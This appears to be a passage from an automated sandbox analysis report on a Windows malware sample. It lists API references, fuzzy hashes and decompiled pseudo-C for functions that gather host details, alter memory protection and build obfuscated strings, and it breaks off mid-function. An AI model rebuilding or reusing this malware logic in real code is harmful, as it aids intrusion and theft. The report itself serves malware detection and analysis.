GetConsoleOutputCP.KERNEL32(00000000,01127436,00000001,?,00000005,00000000,00000000,?,?,?,01127436,?), ref: 0112CF55
WideCharToMultiByte.KERNEL32(00000000,?,?,?,01127436,?), ref: 0112CF5C
WriteConsoleA.KERNEL32(011541C8,?,01127436,?,00000000,?,?,?,01127436,?), ref: 0112CF83

Memory Dump Source

Source File: 00000000.00000002.479054596.00000000010EE000.00000020.00020000.sdmp, Offset: 010EE000, based on PE: false

Similarity

API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
String ID:
API String ID: 3432720595-0
Opcode ID: 0b85e6d1a1cc075e36dad838e0053be66ab677c38a53d3fe4780b9e038e2567c
Instruction ID: 90d32cadf8a204d361bca926365a65cdc67a1bf52ba06bf86af6af8959346f45
Opcode Fuzzy Hash: 0b85e6d1a1cc075e36dad838e0053be66ab677c38a53d3fe4780b9e038e2567c
Instruction Fuzzy Hash: 4E215C34600315EEDB3CDBA4E984FEE7B68AB04715F200239E726964C8E77051D4DB97

Uniqueness

Uniqueness Score: -1.00%

Function 01155588, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(0114A680,01154200,00000718), ref: 01155709
VirtualProtectEx.KERNEL32(000000FF,?,0000301F,00000040,?), ref: 01155771

Strings

T, xrefs: 01155590
G, xrefs: 01155597
@, xrefs: 0115559D

Memory Dump Source

Source File: 00000000.00000002.479498286.0000000001154000.00000040.00020000.sdmp, Offset: 01154000, based on PE: false

Similarity

API ID: EnvironmentProtectVariableVirtual
String ID: @$G$T
API String ID: 3849859166-1505392691
Opcode ID: 8187974b0d185a8cd1752e1c2f533e418ad3e455aa28e9cb3d75b66f35459a87
Instruction ID: 00c7564183a77d1b4be06220327cde55a7df6bfe80869c2821e4575fbf05bdb6
Opcode Fuzzy Hash: 8187974b0d185a8cd1752e1c2f533e418ad3e455aa28e9cb3d75b66f35459a87
Instruction Fuzzy Hash: 97A17D71920325DFCB6CCFA9D850AAEBBF6BB88354F448129E535A7348D7349984CF60

Uniqueness

Uniqueness Score: -1.00%

Function 011D6BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E011D6BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E011D2902(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x11da2d4; // 0x0
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x11db4c8; // 0x53327e6e
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x11db8f8; // 0x212e7742
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x11da100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x011d6be1
0x011d6be8
0x011d6bec
0x011d6bf1
0x011d6bf8
0x011d6bfb
0x011d6c05
0x011d6c0a
0x011d6c16
0x011d6c1d
0x011d6c27
0x011d6c27
0x011d6c1f
0x011d6c1f
0x011d6c1f
0x011d6c1f
0x011d6c2d
0x011d6c30
0x011d6c38
0x011d6c3b
0x011d6c3e
0x011d6c41
0x011d6c46
0x011d6c4f
0x011d6c5c
0x011d6c51
0x011d6c57
0x011d6c57
0x011d6c62
0x011d6c62
0x011d6c6a

APIs

Part of subcall function 011D2902: SysAllocString.OLEAUT32(?), ref: 011D295E
Part of subcall function 011D2902: SysAllocString.OLEAUT32(53327E6E), ref: 011D2972
Part of subcall function 011D2902: SysAllocString.OLEAUT32(00000000), ref: 011D2984
Part of subcall function 011D2902: SysFreeString.OLEAUT32(00000000), ref: 011D29E8

memset.NTDLL ref: 011D6C05
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 011D6C41
GetLastError.KERNEL32 ref: 011D6C51
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 011D6C62

Strings

<, xrefs: 011D6C16

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 2bc1ede5753dca70ca430426cb2b730cb4b196ad2ac7c3959af1a932013ca5ec
Instruction ID: 079a6d472f7789ef30d557fee528bb705fcee38c858a1b0d130329717d1d8c5c
Opcode Fuzzy Hash: 2bc1ede5753dca70ca430426cb2b730cb4b196ad2ac7c3959af1a932013ca5ec
Instruction Fuzzy Hash: 68110C71D01218AFDB18DFA9E889BD97BF8EF08394F008026E919E7181D774A544CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 011D39C5, Relevance: 7.7, APIs: 6, Instructions: 163COMMON

Download Yara Rule

APIs

memcpy.NTDLL(011D4A23,011D70D9,00000010,?,?,?,011D4A23,00000001,011D70D9,00000000,?,011D62B1,00000000,011D70D9,?,00000000), ref: 011D3A16
memcpy.NTDLL(00000000,00000000,00000000,00000010), ref: 011D3AA9
GetLastError.KERNEL32(?,?,00000010), ref: 011D3B01
GetLastError.KERNEL32 ref: 011D3B33
GetLastError.KERNEL32 ref: 011D3B47
GetLastError.KERNEL32(?,?,?,011D4A23,00000001,011D70D9,00000000,?,011D62B1,00000000,011D70D9,?,00000000,011D70D9,00000000,00000000), ref: 011D3B5C

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLast$memcpy
String ID:
API String ID: 2760375183-0
Opcode ID: 26db534825839e0e1b4dab131ea71c449a5843aef5fb576020d888a1352cfc43
Instruction ID: 567d16f6f4bddcf1a8398ae3710b2fd51020aa0bf4aa316de7b024a7550a8925
Opcode Fuzzy Hash: 26db534825839e0e1b4dab131ea71c449a5843aef5fb576020d888a1352cfc43
Instruction Fuzzy Hash: 1A515AB1901208FFEF18DFA8DC84AAEBBB9FB04344F008425F921E7240D7309A54CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011D2A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E011D2A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E011D6837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E011D50CA(_v16);
								goto L37;
							}
							_t103 = E011D6837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x11da2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x011d2a2a
0x011d2a31
0x011d2a36
0x011d2a39
0x011d2a40
0x011d2a43
0x011d2a46
0x011d2a4d
0x011d2a50
0x011d2ba4
0x011d2ba6
0x011d2ba8
0x011d2bad
0x011d2bad
0x011d2a56
0x011d2a59
0x011d2a5c
0x011d2a5e
0x011d2a5e
0x011d2a62
0x00000000
0x00000000
0x011d2a66
0x011d2a92
0x011d2a97
0x011d2a99
0x011d2a99
0x011d2a9c
0x011d2a9f
0x011d2a9f
0x011d2aa1
0x00000000
0x011d2a6c
0x011d2a6e
0x011d2a8d
0x011d2a8d
0x011d2aa4
0x011d2aa4
0x011d2aa5
0x011d2aa5
0x011d2aa8
0x00000000
0x00000000
0x00000000
0x011d2aa8
0x011d2a72
0x011d2ab9
0x011d2abd
0x011d2b97
0x011d2b99
0x011d2b99
0x011d2b9a
0x011d2b9d
0x00000000
0x011d2b9d
0x011d2ad7
0x011d2adb
0x011d2b93
0x00000000
0x011d2b93
0x011d2ae1
0x011d2ae4
0x011d2ae8
0x011d2aee
0x011d2af1
0x011d2b89
0x011d2b89
0x00000000
0x011d2b8f
0x011d2afc
0x011d2b05
0x011d2b19
0x011d2b20
0x011d2b35
0x011d2b3b
0x011d2b43
0x00000000
0x00000000
0x00000000
0x00000000
0x011d2b45
0x011d2b45
0x011d2b45
0x011d2b4c
0x011d2b54
0x00000000
0x00000000
0x011d2b56
0x011d2b5f
0x00000000
0x00000000
0x00000000
0x011d2b61
0x011d2b63
0x011d2b66
0x011d2b66
0x011d2b69
0x011d2b6d
0x011d2b70
0x011d2b76
0x011d2b79
0x011d2b80
0x00000000
0x011d2afc
0x011d2a77
0x011d2a82
0x011d2a85
0x011d2a87
0x011d2a87
0x011d2a8a
0x011d2a8c
0x00000000
0x011d2a8c
0x011d2a66
0x011d2aac
0x011d2ab1
0x011d2ab3
0x011d2ab3
0x011d2ab6
0x011d2ab6
0x00000000

APIs

Part of subcall function 011D6837: RtlAllocateHeap.NTDLL(00000000,00000000,011D4197), ref: 011D6843

lstrcpy.KERNEL32(00000001,00000020), ref: 011D2B20
lstrcat.KERNEL32(00000001,00000020), ref: 011D2B35
lstrcmp.KERNEL32(00000000,00000001), ref: 011D2B4C
lstrlen.KERNEL32(00000001), ref: 011D2B70

Strings

, xrefs: 011D2AB9

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 9d8af51495ec39b6ecb5624e3f841042dd4d7e140b4bc09f788b3f4fb0cda95b
Instruction ID: 89ee4ed759c21313092f5670b4261cc3b4cef0d8acc1a969a5701e7c534a69d5
Opcode Fuzzy Hash: 9d8af51495ec39b6ecb5624e3f841042dd4d7e140b4bc09f788b3f4fb0cda95b
Instruction Fuzzy Hash: 2351B271A00219EFDF29CF9DC584BADBBB6FF45314F15806AE9259B201C7B0AA41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011D624D, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E011D624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				void* _t42;
				void* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x11da2d4; // 0x0
				_t1 = _t9 + 0x11db60c; // 0x63dcc828
				_t36 = 0;
				_t28 = E011D278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x1
					_t40 = E011D6837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t36 = E011D49FE(_t33, _t34, _t40, _a8);
						E011D50CA(_t40);
						_t42 = E011D7565( *0x11da10c(_t36, "="), _t36);
						if(_t42 != 0) {
							E011D50CA(_t36);
							_t36 = _t42;
						}
						_t43 = E011D52E5(_t36, _t33);
						if(_t43 != 0) {
							E011D50CA(_t36);
							_t36 = _t43;
						}
					}
					E011D50CA(_t28);
				}
				return _t36;
			}

0x011d624d
0x011d6250
0x011d6251
0x011d6258
0x011d625f
0x011d6266
0x011d626a
0x011d6271
0x011d6278
0x011d627d
0x011d6285
0x011d628f
0x011d6293
0x011d6297
0x011d629d
0x011d62a2
0x011d62b2
0x011d62b4
0x011d62cb
0x011d62cf
0x011d62d2
0x011d62d7
0x011d62d7
0x011d62e0
0x011d62e4
0x011d62e7
0x011d62ec
0x011d62ec
0x011d62e4
0x011d62ef
0x011d62f4
0x011d62fa

APIs

Part of subcall function 011D278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,011D6266,63DCC828,00000000,00000000,?,00000000,011D70D9), ref: 011D27F3
Part of subcall function 011D278C: sprintf.NTDLL ref: 011D2814

lstrlen.KERNEL32(00000000,00000000,63DCC828,00000000,00000000,?,00000000,011D70D9,00000000,00000000), ref: 011D6278
lstrlen.KERNEL32(00000000,?,00000000,011D70D9,00000000,00000000), ref: 011D6280

Part of subcall function 011D6837: RtlAllocateHeap.NTDLL(00000000,00000000,011D4197), ref: 011D6843

strcpy.NTDLL ref: 011D6297
lstrcat.KERNEL32(00000000,00000000), ref: 011D62A2

Part of subcall function 011D49FE: lstrlen.KERNEL32(00000000,00000000,011D70D9,00000000,?,011D62B1,00000000,011D70D9,?,00000000,011D70D9,00000000,00000000), ref: 011D4A0F

Part of subcall function 011D50CA: HeapFree.KERNEL32(00000000,00000000,011D4239,00000000,00000001,?,00000000,?,?,?,011D6B8D,00000000,?,00000001), ref: 011D50D6

Part of subcall function 011D7565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,011D62CB,00000000,?,00000000,011D70D9,00000000,00000000), ref: 011D756F
Part of subcall function 011D7565: _snprintf.NTDLL ref: 011D75CD

Strings

=, xrefs: 011D62B9

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFree_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 3759146525-1428090586
Opcode ID: 03ab19942739cba4b0bb0bd17265aaa8c0d7c46ac7fd5f97b843cf052f9d2f45
Instruction ID: 2f90f65f7b446d80c7189acfaaedb7a71248b2ab760122afe1dd9bd12b76fba3
Opcode Fuzzy Hash: 03ab19942739cba4b0bb0bd17265aaa8c0d7c46ac7fd5f97b843cf052f9d2f45
Instruction Fuzzy Hash: FF11A57390232A77876A7BB99C44C7F3BAE9E695683054025FA05E7200DF75CD02D7E4

Uniqueness

Uniqueness Score: -1.00%

Function 011D4C1B, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E011D4C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x11da2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x11da2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x11da2b0 = _t6;
				 *0x11da2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x11da2ac = _t7;
				if(_t7 == 0) {
					 *0x11da2ac =  *0x11da2ac | 0xffffffff;
				}
				return 0;
			}

0x011d4c23
0x011d4c2b
0x011d4c30
0x00000000
0x011d4c7d
0x011d4c32
0x011d4c3a
0x011d4c7a
0x00000000
0x011d4c7a
0x011d4c3c
0x011d4c41
0x011d4c53
0x011d4c58
0x011d4c5e
0x011d4c66
0x011d4c6b
0x011d4c6d
0x011d4c6d
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,011D6B4E,?,?,00000001), ref: 011D4C23
GetVersion.KERNEL32(?,00000001), ref: 011D4C32
GetCurrentProcessId.KERNEL32(?,00000001), ref: 011D4C41
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 011D4C5E
GetLastError.KERNEL32(?,00000001), ref: 011D4C7D

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: bf19057272cf3d8302f64d8c7f415114e06b437de708a3ff1404f067c8b0bb1d
Instruction ID: ff647624afd1ab1d6b3ae4947ce48f921748a341a74904c1ffc5e0eb97b29680
Opcode Fuzzy Hash: bf19057272cf3d8302f64d8c7f415114e06b437de708a3ff1404f067c8b0bb1d
Instruction Fuzzy Hash: 97F03A706473119FEB3CDF6AB809B163BB8AB04755F004539E666D66DCD7728080CF25

Uniqueness

Uniqueness Score: -1.00%

Function 011D53F2, Relevance: 6.2, APIs: 4, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E011D53F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				long _t42;
				long _t48;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr* _t70;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				long _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E011D58F8();
				if(_t27 != 0) {
					_t77 =  *0x11da2b4; // 0x23f00206
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x11da2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x11da148(0, 2);
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E011D696F( &_v8,  &_v16);
					_push(0);
					_t84 = _t31;
					_t32 =  *0x11da2d4; // 0x0
					_push(0x11da2fc);
					_push(1);
					_t7 = _t32 + 0x11db5ad; // 0x8b330082
					 *0x11da2f8 = 0xc;
					 *0x11da300 = 0;
					L011D4AF8();
					if(E011D6384(_t79,  &_v24,  &_v12) == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						_t70 =  *0x11da134; // 0x11d7909
						if(_t37 != 0) {
							E011D4454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E011D6837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x11da2d4; // 0x0
								_t18 = _t64 + 0x11db84f; // 0x771c5467
								 *_t70(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x11da32c = _t87;
						}
						_t38 = E011D60E1();
						 *0x11da2c8 =  *0x11da2c8 ^ 0xe8fa7dd7;
						 *0x11da31c = _t38;
						_t39 = E011D6837(0x60);
						__eflags = _t39;
						 *0x11da37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x11da37c; // 0x0
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x11da37c; // 0x0
							 *_t56 = 0x11db83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x11da290, _t84, 0x43);
							__eflags = _t42;
							 *0x11da314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x11da2b4; // 0x23f00206
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x11da2d4; // 0x0
								_t19 = _t76 + 0x11db53a; // 0x66e03591
								_t73 = _t19;
								 *_t70(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x11d92a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E011D4454( ~_v8 &  *0x11da2c8, 0x11da00c);
								_t84 = E011D2206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E011D1376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t84 = E011D2022(_t79, _t82, _v8);
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E011D2439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x11da14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E011D6BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x011d53f2
0x011d53fd
0x011d5400
0x011d5403
0x011d5406
0x011d540d
0x011d540f
0x011d541b
0x011d541d
0x011d541d
0x011d5426
0x011d542e
0x011d5431
0x011d544b
0x011d5450
0x011d5451
0x011d5453
0x011d5458
0x011d545d
0x011d545f
0x011d5466
0x011d5470
0x011d5476
0x011d548a
0x011d548f
0x011d548f
0x011d5498
0x011d54c1
0x011d54c4
0x011d54c6
0x011d54d1
0x011d54d8
0x011d54e4
0x011d54e6
0x011d54e8
0x011d54ed
0x011d54f3
0x011d54f9
0x011d54ff
0x011d5502
0x011d5507
0x011d550f
0x011d5511
0x011d5511
0x011d5514
0x011d5514
0x011d551a
0x011d551f
0x011d5527
0x011d552c
0x011d5531
0x011d5533
0x011d5538
0x011d5567
0x011d553a
0x011d553f
0x011d5544
0x011d5549
0x011d5550
0x011d5556
0x011d555b
0x011d5561
0x011d5561
0x011d5568
0x011d556a
0x011d5579
0x011d557f
0x011d5581
0x011d5586
0x011d55b2
0x011d5588
0x011d5588
0x011d558e
0x011d559b
0x011d55a1
0x011d55a1
0x011d55a9
0x011d55ab
0x011d55b3
0x011d55b5
0x011d55bc
0x011d55c9
0x011d55d3
0x011d55d5
0x011d55d7
0x00000000
0x00000000
0x011d55d9
0x011d55de
0x011d55e0
0x011d55e7
0x011d55eb
0x011d55ee
0x011d5603
0x011d560c
0x00000000
0x011d560c
0x011d55f0
0x011d55f2
0x00000000
0x00000000
0x011d55f4
0x011d55fd
0x011d55ff
0x011d5601
0x00000000
0x00000000
0x00000000
0x011d5601
0x011d55e4
0x011d55e4
0x011d55b5
0x011d549a
0x011d549a
0x011d549f
0x011d560e
0x011d5612
0x011d561a
0x011d561a
0x00000000
0x011d5612
0x011d54a5
0x011d54a8
0x011d54a8
0x011d54aa
0x011d54ad
0x011d54b5
0x011d54bc
0x00000000
0x011d5622
0x011d5622
0x011d5625
0x011d562a
0x011d562a

APIs

Part of subcall function 011D58F8: GetModuleHandleA.KERNEL32(E66068DB,00000000,011D540B,00000000,00000000,00000000,?,?,?,?,?,011D6BD8,?,00000001), ref: 011D5907

CloseHandle.KERNEL32(?,?,00000001,8B330082,00000001,011DA2FC,00000000,?,?,?,?,?,?,?,011D6BD8), ref: 011D548F
memset.NTDLL ref: 011D553F
RtlInitializeCriticalSection.NTDLL(-00000040), ref: 011D5550
RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 011D5579

Part of subcall function 011D4454: RtlAllocateHeap.NTDLL(00000000,011D55CE), ref: 011D44A2
Part of subcall function 011D4454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,011D55CE,?,?,?,?,?,011D6BD8,?,00000001), ref: 011D44D0
Part of subcall function 011D4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 011D44F7
Part of subcall function 011D4454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 011D450B
Part of subcall function 011D4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 011D4518
Part of subcall function 011D4454: HeapFree.KERNEL32(00000000,00000000), ref: 011D4536

Part of subcall function 011D6837: RtlAllocateHeap.NTDLL(00000000,00000000,011D4197), ref: 011D6843

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Allocate$ComputerFreeHandleName$CloseCriticalInitializeModuleSectionmemset
String ID:
API String ID: 705796739-0
Opcode ID: 0d8c6ebea8450bbe7ff9ad90560af953f03e9fcecc50c7b1d329f37b721bc1ea
Instruction ID: 245ec186dc1cb6169bc5a0613a9893fda1e07eeb695b41fa947c47055e2aa9b5
Opcode Fuzzy Hash: 0d8c6ebea8450bbe7ff9ad90560af953f03e9fcecc50c7b1d329f37b721bc1ea
Instruction Fuzzy Hash: E1513671A02225ABEB6DDB6DF844BAE77FAAF04744F010025E914E7244DB74D980CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 011D1D57, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E011D1D57(void* __ecx, intOrPtr _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				intOrPtr _t59;
				intOrPtr* _t60;
